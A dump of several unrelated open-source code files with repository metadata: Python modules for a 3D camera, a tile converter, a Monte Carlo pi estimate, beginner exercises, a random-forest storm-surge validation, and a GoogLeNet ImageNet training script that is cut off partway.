# Berbeglia, G., Garassino, A., & Vulcano, G. (2018). A comparative empirical study of discrete choice models in retail operations. Available at SSRN 3136816.
class MarketExplorer(object):
def explore_for(self, estimator, model, transactions):
raise NotImplementedError('Subclass responsibility')
| [
"ajgarassino@gmail.com"
] | ajgarassino@gmail.com |
41d4e71f3e2a6c62792fb61263f2cdbb41a99d1d | 8f6aa9ac9c8c2e409875bbf36fbc49b3eb37d88b | /enthought/block_canvas/context/api.py | 0276b7ff919b2cbbf3ae5be3f8dfde407fb57b44 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | enthought/etsproxy | 5660cf562c810db2ceb6b592b6c12274bce96d73 | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | refs/heads/master | 2023-03-27T04:51:29.297305 | 2020-12-02T09:05:18 | 2020-12-02T09:05:18 | 1,632,969 | 3 | 1 | NOASSERTION | 2020-12-02T09:05:20 | 2011-04-18T22:29:56 | Python | UTF-8 | Python | false | false | 92 | py | # proxy module
from __future__ import absolute_import
from blockcanvas.context.api import *
| [
"ischnell@enthought.com"
] | ischnell@enthought.com |
e5aea76cc15e3bf47cf1e7969a74795b665ae48f | 943d0787140ee5bb09ffee6740d805426c9cbd01 | /Problem14-EstimatePi.py | deae90714cb278a3ba67ff3a5586a7042e0e47af | [] | no_license | pengnam/DailyCodingProblemSolutions | 20d30bd1387a605e097fc93474725f1014fbc6c3 | 625a206d67336e705901c685ac1d9cae647d0ac6 | refs/heads/master | 2020-04-25T13:47:13.309877 | 2019-05-07T16:21:46 | 2019-05-07T16:21:46 | 172,819,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | """
The area of a circle is defined as (pi)*r^2. Estimate pi to 3 decimal places using a Monte Carlo method.
"""
import random
#I will approximate give r = 1. I will try within x = [0,1], y=[0,1], and check if point in circle (1/4 of a circle)
def solution():
rounds = 10000000
count = 0
for _ in range(rounds):
x = random.random()
y = random.random()
if (x**2 + y**2) <= 1:
count += 1
print(count)
return ((float(count))/rounds) * 4
print(solution())
| [
"seanngpengnam@gmail.com"
] | seanngpengnam@gmail.com |
bbdd48a6ccdb523dcc383c57275638331914fd6c | 57320faf6dc6fb5cf4ad896c11a6aedf22be6ddb | /pyplex/camera.py | 40c01e6911d808a46f37945ddd4874a846d605c6 | [
"MIT"
] | permissive | pyplex/pyplex | ed183d11c27339a1a857a11b34a10f541a53ea44 | 66e19acb3efd1a8a69d28022edcb0b6ad5cb6b11 | refs/heads/master | 2021-01-25T11:39:33.853304 | 2018-06-06T11:47:37 | 2018-06-06T11:47:37 | 117,576,175 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,910 | py | from pyplex import gl
from pyplex.abstract import UniformObject
from pyplex.glow.buffer import UniformBuffer
from pyplex.transform import *
import numpy as np
from math import sin, cos
class Camera(UniformObject):
def __init__(self, ctx: gl.GL_ANY, projection: np.matrix, view: np.matrix):
self._projection = projection
self._view = view
self._position = invert(view)[3, :3]
buffer = np.empty(1, [('projection', '(4,4)f4'), ('view', '(4,4)f4'), ('position', '3f4')])
buffer['projection'] = self._projection
buffer['view'] = self._view
buffer['position'] = self._position
self._buffer = UniformBuffer(ctx, buffer, gl.BufferUsage.STREAM_DRAW)
@property
def buffer(self) -> UniformBuffer:
return self._buffer
@property
def projection(self) -> np.matrix:
return self._projection
@projection.setter
def projection(self, value: np.matrix):
self._projection = np.asmatrix(value)
self._buffer['projection'] = self._projection
@property
def view(self) -> np.matrix:
return self._view
@view.setter
def view(self, value: np.matrix):
self._view = np.asmatrix(value)
self._position = np.asarray(invert(self._view))[3, :3]
self._buffer['view'] = self._view
self._buffer['position'] = self._position
@property
def position(self) -> np.ndarray:
return self._position
class PerspectiveCamera(Camera):
def __init__(self, ctx: gl.GL_ANY, fov: float, aspect: float, near: float, far: float, view: np.matrix):
super().__init__(ctx, perspective(fov, aspect, near, far), view)
self._fov = fov
self._aspect = aspect
self._near = near
self._far = far
@property
def fov(self) -> float:
return self._fov
@fov.setter
def fov(self, value: float):
self._fov = value
self._update_projection()
@property
def aspect(self) -> float:
return self._aspect
@aspect.setter
def aspect(self, value: float):
self._aspect = value
self._update_projection()
@property
def near(self) -> float:
return self._near
@near.setter
def near(self, value: float):
self._near = value
self._update_projection()
@property
def far(self) -> float:
return self._far
@far.setter
def far(self, value: float):
self._far = value
self._update_projection()
def _update_projection(self):
self.projection = perspective(self._fov, self._aspect, self._near, self._far)
class TrackBallCamera(PerspectiveCamera):
def __init__(self, ctx: gl.GL_ANY, fov: float, aspect: float, near: float, far: float,
pivot: np.ndarray, up: np.ndarray, theta: float, phi: float, radius: float):
self._pivot = pivot
self._up = up
self._theta = theta
self._phi = phi
self._radius = radius
self._rotation = np.array([
sin(self._theta) * cos(self._phi),
cos(self._theta),
sin(self._theta) * sin(self._phi)],
np.float32)
self._position = self._pivot + self._radius * self._rotation
super().__init__(ctx, fov, aspect, near, far, look_at(self._position, self._pivot, self._up))
@property
def position(self) -> np.ndarray:
return self._position
@property
def pivot(self) -> np.ndarray:
return self._pivot
@pivot.setter
def pivot(self, value: np.ndarray):
self._pivot = value
self._update_view()
@property
def rotation(self) -> np.ndarray:
return self._rotation
@rotation.setter
def rotation(self, value: np.ndarray):
self._rotation = value
self._update_view()
@property
def up(self) -> np.ndarray:
return self._up
@up.setter
def up(self, value: np.ndarray):
self._up = value
self._update_view()
@property
def theta(self) -> float:
return self._theta
@theta.setter
def theta(self, value: float):
self._theta = value
self._update_view()
@property
def phi(self) -> float:
return self._phi
@phi.setter
def phi(self, value: float):
self._phi = value
self._update_view()
@property
def radius(self) -> float:
return self._radius
@radius.setter
def radius(self, value: float):
self._radius = value
self._update_view()
def _update_view(self):
self._rotation = np.array([
sin(self._theta) * cos(self._phi),
cos(self._theta),
sin(self._theta) * sin(self._phi)],
np.float32)
self._position = self._pivot + self._radius * self._rotation
self.view = look_at(self._position, self._pivot, self._up)
| [
"pyplex@github.com"
] | pyplex@github.com |
2dc5069739fbc75160cb5599b04da652d5d2581b | d8af7c6372aff57012c80d3b8a9dfaab81499f71 | /AIDStudy/01-PythonBase/day03/exercise03.py | 92c88709cd7037da27f1e3b4872d4cc81434046a | [] | no_license | fanxiao168/pythonStudy | 4843c56019b8f997fd7fc566904a9e0162e9a541 | f94e2238d40c41ee54ff4184c500d659c6820c03 | refs/heads/master | 2021-02-04T20:54:10.850770 | 2020-05-28T08:55:35 | 2020-05-28T08:55:35 | 243,708,800 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | # 输入一个数字
# 再输入一个运算符 + - * /
# 最后输入另外一个数字
# 根据运算符计算两个数字
# 要求 如果运算符 不是加减乘除 提示运算符有误
num1 = float(input('请输入第一个数:'))
op = input('请输入运算符:')
num2 = float(input('请输入第二个数:'))
# 判断 如果用户输入的内容是+
if op == '+':
print(num1 + num1)
elif op == '-':
print(num1 - num2)
elif op == '*':
print(num1 * num2)
elif op == '/':
print(num1 / num2)
else:
print('运算符有误')
| [
"fanxiao168@126.com"
] | fanxiao168@126.com |
ab0399b72847499a6f1bc5c6da365a5ce12362f2 | bc97fab684295fa362ab38cb79c2a0a36c565529 | /routes/__init__.py | a1c60b73d6b70d8a876c4b518dfce803a4767fd1 | [] | no_license | GDGVIT/chatapp | 80422a6ce09eba24c2a211fd1414fbeeb24f8692 | 8589d1cbc2176c6c95e365953497e56309bc5c07 | refs/heads/master | 2021-01-13T09:11:08.387588 | 2016-10-28T06:26:15 | 2016-10-28T06:26:15 | 68,836,814 | 3 | 3 | null | 2016-10-14T18:26:36 | 2016-09-21T16:33:53 | Python | UTF-8 | Python | false | false | 79 | py | from controllers import *
route=[
(
r"/faq",
chat.QuestionHandler
)
]
| [
"shubham.bhardwaj2015@vit.ac.in"
] | shubham.bhardwaj2015@vit.ac.in |
37fc610c21e71bf7723717c2eab70e6d67051308 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/1/bDf.py | 66f9bf27ac4a73ccf9b45ac269ebdf3aded004b7 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'bDF':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
8fbfc6b612875791ee39f0aab8bb242440512264 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/272-tideGauge.py | d58ed71fbe716fd71749b6198acfe2f3b5ed6343 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,456 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
    """
    run KFOLD method for regression

    Validates a Random Forest surge model for one tide gauge (index range
    x..y below): loads lagged MERRA predictors, standardizes them, merges
    with daily-max surge observations, reduces with PCA (95% variance),
    then scores a RandomForestRegressor with 10-fold cross validation.
    Results (correlation, RMSE, metadata) are appended to a CSV in dir_out.
    """
    #defining directories
    dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
    dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
    surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
    #cd to the lagged predictors directory
    os.chdir(dir_in)
    # Tide-gauge index window: this job processes only gauge 272.
    x = 272
    y = 273
    #empty dataframe for model validation
    df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
                                 'num_95pcs','corrn', 'rmse'])
    #looping through
    for tg in range(x,y):
        os.chdir(dir_in)
        #filter only .csv files
        tgNames = []
        for file in glob.glob("*.csv"):
            tgNames.append(file)
        # Gauges are addressed by their position in the sorted file list.
        tg_name = sorted(tgNames)[tg]
        print(tg_name)
        ##########################################
        #check if this tg is already taken care of
        ##########################################
        os.chdir(dir_out)
        if os.path.isfile(tg_name):
            print("this tide gauge is already taken care of")
            # NOTE(review): `return` exits the whole function, not just this
            # gauge; harmless here because the range covers a single gauge.
            return "file already analyzed!"
        os.chdir(dir_in)
        #load predictor
        pred = pd.read_csv(tg_name)
        pred.drop('Unnamed: 0', axis = 1, inplace = True)
        #add squared and cubed wind terms (as in WPI model)
        pickTerms = lambda x: x.startswith('wnd')
        wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
        wnd_sqr = pred[wndTerms]**2
        wnd_cbd = pred[wndTerms]**3
        pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
        #standardize predictor data (zero mean, unit variance per column)
        dat = pred.iloc[:,1:]
        scaler = StandardScaler()
        print(scaler.fit(dat))
        dat_standardized = pd.DataFrame(scaler.transform(dat), \
                                        columns = dat.columns)
        pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
        #load surge data
        os.chdir(surge_path)
        surge = pd.read_csv(tg_name)
        surge.drop('Unnamed: 0', axis = 1, inplace = True)
        #remove duplicated surge rows
        surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
        surge.reset_index(inplace = True)
        surge.drop('index', axis = 1, inplace = True)
        #adjust surge time format to match that of pred
        time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
        surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
        time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
        surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
        #merge predictors and surge to find common time frame
        pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
        pred_surge.sort_values(by = 'date', inplace = True)
        #find rows that have nans and remove them
        row_nan = pred_surge[pred_surge.isna().any(axis =1)]
        pred_surge.drop(row_nan.index, axis = 0, inplace = True)
        pred_surge.reset_index(inplace = True)
        pred_surge.drop('index', axis = 1, inplace = True)
        #in case pred and surge don't overlap
        if pred_surge.shape[0] == 0:
            print('-'*80)
            print('Predictors and Surge don''t overlap')
            print('-'*80)
            continue
        # Re-parse dates into real timestamps for the time-span computation below.
        pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
                                                   pred_surge['date'])), \
                                          columns = ['date'])
        #prepare data for training/testing
        X = pred_surge.iloc[:,1:-1]
        y = pd.DataFrame(pred_surge['surge'])
        y = y.reset_index()
        y.drop(['index'], axis = 1, inplace = True)
        #apply PCA retaining 95% of the variance
        pca = PCA(.95)
        pca.fit(X)
        X_pca = pca.transform(X)
        #apply 10 fold cross validation
        # NOTE(review): random_state without shuffle=True is rejected by
        # newer scikit-learn releases -- confirm the pinned sklearn version.
        kf = KFold(n_splits=10, random_state=29)
        metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
        for train_index, test_index in kf.split(X):
            X_train, X_test = X_pca[train_index], X_pca[test_index]
            y_train, y_test = y['surge'][train_index], y['surge'][test_index]
            #train regression model
            rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
                                      min_samples_leaf = 1)
            rf.fit(X_train, y_train)
            #predictions
            predictions = rf.predict(X_test)
            # pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
            #                       pd.DataFrame(np.array(y_test))], \
            #                      axis = 1)
            # pred_obs.columns = ['pred', 'obs']
            # combo = pd.concat([combo, pred_obs], axis = 0)
            #evaluation matrix - skip folds whose correlation p-value >= 0.05
            if stats.pearsonr(y_test, predictions)[1] >= 0.05:
                print("insignificant correlation!")
                continue
            else:
                print(stats.pearsonr(y_test, predictions))
                metric_corr.append(stats.pearsonr(y_test, predictions)[0])
                print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
                print()
                metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
        #number of years used to train/test model
        num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
                     pred_surge['date'][0]).days/365
        longitude = surge['lon'][0]
        latitude = surge['lat'][0]
        num_pc = X_pca.shape[1] #number of principal components
        corr = np.mean(metric_corr)
        rmse = np.mean(metric_rmse)
        print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
              np.mean(metric_rmse), '\n')
        #original size and pca size of matrix added
        new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
        new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
                          'num_95pcs','corrn', 'rmse']
        df = pd.concat([df, new_df], axis = 0)
        #save df as csv - in case of interruption
        os.chdir(dir_out)
        df.to_csv(tg_name)
#run script
validateRF()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
120402a3318b661368d53aa0f4f1e993bef44455 | 19d43b8c175bb5304393cf9c259eacb7110dd4fc | /objectModel/Python/cdm/utilities/event_callback.py | e7c5744ba710772abc5530e73121d00b2f7291de | [
"CC-BY-4.0",
"MIT"
] | permissive | bissont/CDM | 3fd814566ea1bf9d19e300cd5b438b384ce4bcba | 0cffb140e0b41e526be072b547cae91a03c4cd6f | refs/heads/master | 2020-12-29T12:55:23.822187 | 2020-02-05T02:19:27 | 2020-02-05T02:19:27 | 238,614,156 | 1 | 0 | null | 2020-02-06T05:21:51 | 2020-02-06T05:21:50 | null | UTF-8 | Python | false | false | 161 | py | from typing import Callable, TYPE_CHECKING
# Import CdmStatusLevel only during static type checking; at runtime the
# forward-reference string in the alias below avoids the import entirely.
if TYPE_CHECKING:
    from cdm.enums import CdmStatusLevel
# Callback signature used to report status events: (level, message) -> None.
EventCallback = Callable[['CdmStatusLevel', str], None]
| [
"nebanfic@microsoft.com"
] | nebanfic@microsoft.com |
4d86c8a9d2eea6877b3ae62aab7674df7906b1f3 | 204f3779f22cc66ff5adb8753ccde53eb2550f95 | /dem-preprocessing/tiler-tools/tiles_convert.py | a27b9f1d120449d269e91c19f0e5b77508a345bc | [
"MIT"
] | permissive | ghelobytes/ol3-dem | 6f8e2a9ba0721fdcda1ed251bad2daeb1f150f79 | 445fc04d0b5b8990bf404eceed6bfc79d084e93c | refs/heads/master | 2020-12-28T21:28:09.410426 | 2014-01-01T03:25:38 | 2014-01-01T03:25:38 | 15,589,948 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,596 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c) 2010, 2013 Vadim Shlyakhov
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
import logging
import optparse
from tiler_functions import *
from converter_backend import TileSet, TileConverter
import converter_xyz
import converter_maemomapper
import converter_sasplanet
try:
import converter_mmap
except ImportError:
pass
#~ import rpdb2; rpdb2.start_embedded_debugger('nRAmgJHm')
#----------------------------
def convert(src_lst, options):
#----------------------------
    """Convert every tile source in *src_lst* to the destination layout.

    The reader and writer classes are looked up from options.in_fmt and
    options.out_fmt; each source is then converted in turn.
    """
    reader_cls = TileSet.get_class(options.in_fmt, isDest=False)
    writer_cls = TileSet.get_class(options.out_fmt, isDest=True)
    for src_path in src_lst:
        source_set = reader_cls(src_path, options)
        writer_cls(options=options, src=source_set).convert()
#----------------------------
def main(argv):
#----------------------------
    """Command-line entry point: parse options and run the tile conversion.

    *argv* is the full sys.argv list (program name included).
    """
    parser = optparse.OptionParser(
        usage='usage: %prog [<options>...] <source>...',
        version=version,
        description='copies map tiles from one structure to another')
    parser.add_option('--from', dest='in_fmt', default='zyx',
        help='input tiles profile (default: zyx)')
    parser.add_option('--to', dest='out_fmt', default='mmap',
        help='output tiles profile (default: mmap)')
    parser.add_option('--list-profiles', '--lp', action='store_true',
        help='list available profiles')
    parser.add_option('-f', '--tile-format', dest='convert_tile', metavar='FORMAT',
        help='convert output tiles to format (default: no conversion)')
    parser.add_option('--list-formats', '--lf', action='store_true',
        help='list tile format converters')
    parser.add_option("-n", "--colors", dest="colors", default='256',
        help='Specifies the number of colors for pngnq profile (default: 256)')
    parser.add_option("-q", "--quality", dest="quality", type="int", default=75,
        help='JPEG/WEBP quality (default: 75)')
    parser.add_option('-a', '--append', action='store_true', dest='append',
        help='append tiles to an existing destination')
    parser.add_option('-r', '--remove-dest', action='store_true',dest='remove_dest',
        help='delete destination directory before merging')
    parser.add_option('-t', '--dest-dir', default='.', dest='dst_dir',
        help='destination directory (default: current)')
    parser.add_option('--name', default=None,
        help='layer name (default: derived from the source)')
    parser.add_option('--description', metavar='TXT', default='',
        help='layer decription (default: None)')
    parser.add_option('--overlay', action='store_true',
        help='non-base layer (default: False)')
    parser.add_option('--url', default=None,
        help='URL template (default: None)')
    parser.add_option('--link', action='store_true', dest='link',
        help='make links to source tiles instead of copying if possible')
    parser.add_option("--srs", default='EPSG:3857', dest="tiles_srs",
        help="code of a spatial reference system of a tile set (default is EPSG:3857, aka EPSG:900913)")
    parser.add_option("--proj4def", default=None, metavar="PROJ4_SRS",
        help="proj4 definition for the SRS")
    parser.add_option('-z', '--zoom', default=None,metavar='ZOOM_LIST',
        help='list of zoom ranges to process')
    parser.add_option('-g', '--region', default=None, metavar='DATASOURCE',
        help='region to process (OGR shape or Sasplanet .hlg)')
    parser.add_option('--region-zoom', metavar='N', type="int", default=None,
        help='apply region for zooms only higher than this one (default: None)')
    parser.add_option("--nothreads", action="store_true",
        help="do not use multiprocessing")
    parser.add_option('-d', '--debug', action='store_true', dest='debug')
    parser.add_option('--quiet', action='store_true', dest='quiet')
    #~ global options
    (options, args) = parser.parse_args(argv[1:])
    # Logging level: DEBUG with -d, ERROR with --quiet, INFO otherwise.
    logging.basicConfig(level=logging.DEBUG if options.debug else
        (logging.ERROR if options.quiet else logging.INFO))
    log(options.__dict__)
    # Informational listing modes exit immediately without converting.
    if options.list_profiles:
        TileSet.list_profiles()
        sys.exit(0)
    if options.list_formats:
        TileConverter.list_tile_converters()
        sys.exit(0)
    src_lst=args
    convert(src_lst, LooseDict(options))
# Script entry point: pass the full argv (program name included) to main().
if __name__ == '__main__':
    main(sys.argv)
| [
"s.brandt@riseup.net"
] | s.brandt@riseup.net |
f32647ff11ea96ce75acd8b91328bd999dbfe6f8 | 0689ad04900b45e6ffb85756e65e96f30781558b | /pbase/AID1805/第一阶段 python基础/day09/exercise/myrange.py | 4ae87496e8ca3ec1985a84cbd655a11e0690f4a1 | [] | no_license | lizhihui16/aaa | a5452b5d0de4c2ad6342fce1b8aef278d2d2943e | e8c38e012f6aa0bc05ac6481d6c3e2b4e9013b56 | refs/heads/master | 2020-04-24T01:05:19.266060 | 2019-02-20T01:43:51 | 2019-02-20T01:43:51 | 171,586,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # 2. 写一个 myrange函数,参数可以传1~3个,实际意义同range函数规则相同,此函数返回符合range(...) 函数规则的列表
# 如:
# L = myrange(4)
# print(L) # [0, 1, 2, 3]
# L = myrange(4, 6)
# print(L) # [4, 5]
# L = myrange(1, 10, 3)
# print(L) # [1, 4, 7]
# 方法1
# def myrange(start, stop=None, step=1):
# r_lst = [] # 即将返回的列表
# # 调整三个形参的值
# if stop is None:
# stop = start
# start = 0
# if step > 0:
# while start < stop:
# r_lst.append(start) # 把当前数加入到列表中
# start += step # 让start 向后移动,准备下次操作
# else: # 当步长小于0的情况
# for x in range(start, stop, step):
# r_lst.append(x)
# # 此处把符合条件的数据加到列表r_lst中
# return r_lst
# 方法2
def myrange(start, stop=None, step=1):
    """Mimic range() with 1-3 positional arguments, returning a list.

    myrange(stop), myrange(start, stop) and myrange(start, stop, step)
    all follow the builtin range() rules.
    """
    if stop is None:
        # Single-argument form: the lone value is the stop, start is 0.
        start, stop = 0, start
    return list(range(start, stop, step))
# Demonstration calls matching the examples in the exercise statement above.
L = myrange(4)
print(L) # [0, 1, 2, 3]
L = myrange(4, 6)
print(L) # [4, 5]
L = myrange(1, 10, 3)
print(L) # [1, 4, 7]
L = myrange(10, 1, -3)
print(L) # [10, 7, 4]
| [
"tarena@tedu.cn"
] | tarena@tedu.cn |
f2ee8ed0f141c3f878bd554027310f7d960f5054 | 222ead89dd6615e4721f389cc53a76750b15b8c5 | /examples/imagenet/train.py | 9f0a4c4a0d2ee4592076d819f375d1fadf2dcd5d | [
"Apache-2.0"
] | permissive | changyu98/GoogLeNet-PyTorch | d577fb0384b908445f27dd8589037c594c9a19d4 | a2fae2b8b14e830a3f64c81bc4e62dadb6cfe5b7 | refs/heads/master | 2021-01-05T13:39:49.885271 | 2020-01-15T13:56:40 | 2020-01-15T13:56:40 | 241,038,261 | 1 | 0 | Apache-2.0 | 2020-02-17T06:47:16 | 2020-02-17T06:47:15 | null | UTF-8 | Python | false | false | 16,817 | py | # Copyright 2020 Lorna Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Evaluate on GoogLeNet. Note that at the moment, training is not implemented (I am working on it).
that being said, evaluation is working.
"""
import argparse
import os
import random
import shutil
import time
import warnings
import PIL
import torch
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from googlenet import GoogLeNet
from googlenet.utils import accuracy
from googlenet.utils import adjust_learning_rate
from googlenet.utils import AverageMeter
from googlenet.utils import get_parameter_number
# Command-line interface for the ImageNet training/evaluation script.
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('data', metavar='DIR',
                    help='path to dataset')
parser.add_argument('-a', '--arch', metavar='ARCH', default='googlenet',
                    help='model architecture (default: googlenet)')
parser.add_argument('-j', '--workers', default=1, type=int, metavar='N',
                    help='number of data loading workers (default: 1)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
                    help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
                    help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=256, type=int,
                    metavar='N',
                    help='mini-batch size (default: 256), this is the total '
                         'batch size of all GPUs on the current node when '
                         'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', '--learning-rate', default=0.01, type=float,
                    metavar='LR', help='initial learning rate', dest='lr')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
                    help='momentum')
parser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,
                    metavar='W', help='weight decay (default: 1e-4)',
                    dest='weight_decay')
parser.add_argument('-p', '--print-freq', default=10, type=int,
                    metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
                    help='path to latest checkpoint (default: none)')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
                    help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
                    help='use pre-trained model')
parser.add_argument('--world-size', default=-1, type=int,
                    help='number of nodes for distributed training')
parser.add_argument('--rank', default=-1, type=int,
                    help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
                    help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
                    help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
                    help='seed for initializing training. ')
parser.add_argument('--gpu', default=0, type=int,
                    help='GPU id to use.')
parser.add_argument('--image_size', default=224, type=int,
                    help='image size')
parser.add_argument('--num_classes', type=int, default=1000,
                    help="number of dataset category.")
parser.add_argument('--multiprocessing-distributed', action='store_true',
                    help='Use multi-processing distributed training to launch '
                         'N processes per node, which has N GPUs. This is the '
                         'fastest way to use PyTorch for either single node or '
                         'multi node data parallel training')
# Best top-1 accuracy seen so far; updated in main_worker via `global`.
best_acc1 = 0
def main():
    """Parse CLI args and launch one worker per GPU (or a single worker)."""
    args = parser.parse_args()
    if args.seed is not None:
        # Seed both Python and torch RNGs and force deterministic cuDNN.
        random.seed(args.seed)
        torch.manual_seed(args.seed)
        cudnn.deterministic = True
        warnings.warn('You have chosen to seed training. '
                      'This will turn on the CUDNN deterministic setting, '
                      'which can slow down your training considerably! '
                      'You may see unexpected behavior when restarting '
                      'from checkpoints.')
    if args.gpu is not None:
        warnings.warn('You have chosen a specific GPU. This will completely '
                      'disable data parallelism.')
    if args.dist_url == "env://" and args.world_size == -1:
        args.world_size = int(os.environ["WORLD_SIZE"])
    args.distributed = args.world_size > 1 or args.multiprocessing_distributed
    ngpus_per_node = torch.cuda.device_count()
    if args.multiprocessing_distributed:
        # Since we have ngpus_per_node processes per node, the total world_size
        # needs to be adjusted accordingly
        args.world_size = ngpus_per_node * args.world_size
        # Use torch.multiprocessing.spawn to launch distributed processes: the
        # main_worker process function
        mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
    else:
        # Simply call main_worker function
        main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, args):
    """Per-process worker: build the model, data loaders, then train/evaluate.

    Args:
        gpu: GPU index for this process (or None for CPU/DataParallel path).
        ngpus_per_node: number of GPUs on this node.
        args: parsed command-line namespace.
    """
    global best_acc1
    args.gpu = gpu
    if args.gpu is not None:
        print("Use GPU: {} for training".format(args.gpu))
    if args.distributed:
        if args.dist_url == "env://" and args.rank == -1:
            args.rank = int(os.environ["RANK"])
        if args.multiprocessing_distributed:
            # For multiprocessing distributed training, rank needs to be the
